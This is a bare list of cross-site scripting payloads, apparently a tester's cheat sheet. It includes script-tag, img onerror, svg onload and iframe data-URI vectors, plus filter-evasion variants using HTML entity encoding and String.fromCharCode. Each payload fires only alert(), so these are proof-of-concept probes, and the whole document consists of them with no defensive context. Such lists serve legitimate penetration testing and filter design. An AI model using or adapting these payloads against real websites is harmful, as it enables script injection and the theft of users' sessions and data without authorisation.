XSS PAYLOAD:

"}]}';<script>alert(1)</script>
<script>alert(1)</script>

#in json script if our parameter are enclosed in " (double) quote then  in that situation html tag will work:
<img src=x onerror=alert(1)>

;alert(2); 
<a href="#" onclick="jscript.compact:alert(1);">test</a>
<a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>
<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<svg/onload=alert('XSS')>


